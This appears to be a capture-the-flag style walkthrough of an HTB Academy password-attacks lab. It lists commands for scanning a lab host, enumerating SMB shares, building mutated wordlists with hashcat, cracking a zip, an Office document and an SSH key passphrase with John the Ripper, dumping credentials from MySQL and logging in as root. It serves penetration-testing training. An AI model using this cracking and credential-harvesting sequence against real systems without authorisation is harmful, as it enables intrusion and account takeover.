Lab - Medium

Hello, everyone. Today, we will be exploring the Medium-level Password Attacks Walkthrough lab from the HTB Academy Penetration Testing Course. Our goal is to obtain the contents of flag.txt in /root/ .

First, we will perform an IP scan to identify open ports and assess the available options.

nmap -sC -sV 10.129.223.102

We have three open ports (22, 139, 445). Let's list the shared resources available on the server.

smbclient -N -L \\\\10.129.223.102\\

Let's review the contents of the SHAREDRIVE share.

smbclient //10.129.223.102/SHAREDRIVE

First, let's apply the rules from custom.rule to each word in password.list and save the modified versions in mut_password.list.

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

Next, let's extract any useful information from the "Docs.zip" file obtained from the SMB server.

zip2john Docs.zip > zip.hash
john --wordlist=mut_password.list zip.hash

We have obtained the password for the file "Docs.zip." Let's use it to extract the contents.

unzip Docs.zip

I've received a file named Documentation.docx. Let's examine it to determine the information it contains.

I attempted to open the file, but it is password-protected. Let's proceed with cracking it.

/usr/share/john/office2john.py Documentation.docx > docs.hash
john --wordlist=mut_password.list docs.hash

We now have the password. Let's proceed by opening the Documentation.docx file to review its contents.

We have obtained the password for the username "jason." Let's proceed with attempting to connect via SSH using these credentials.

ssh jason@10.129.223.102

We have successfully established an SSH connection using the user account "jason".

I investigated and found that port 3306 is open, which is the default port for MySQL. Let's attempt to connect to the MySQL server using Jason's credentials again.

mysql -ujason -p

Let's analyze the database to determine what information we can extract.

show databases;
use users;
show tables;
select * from creds where name = 'dennis';

During the investigation, I discovered an additional username, "dennis," and obtained the associated password from the MySQL server.

Let's use these credentials to log in as the user "dennis".

su dennis

I conducted an extensive investigation to locate the flag and discovered a hint indicating that useful files might be available in the home directory of one of the users.

Let's proceed by obtaining the SSH key for the user Dennis.

cd .ssh
cat id_rsa

Let's copy the content of id_rsa to a file in our attacking machine and adjust its permissions to enable its use. Before doing so, let's extract the password first.

nano id_rsa
ssh2john id_rsa > ssh.hash

First we extracted the hash from the SSH private key file (id_rsa) so that it can be cracked using the John the Ripper.

john --wordlist=mut_password.list  ssh.hash

Here we have obtained the password. Let's update the file permissions and use the file with root access to verify if this solution works.

ssh -i id_rsa root@10.129.223.102

Now we can get the flag.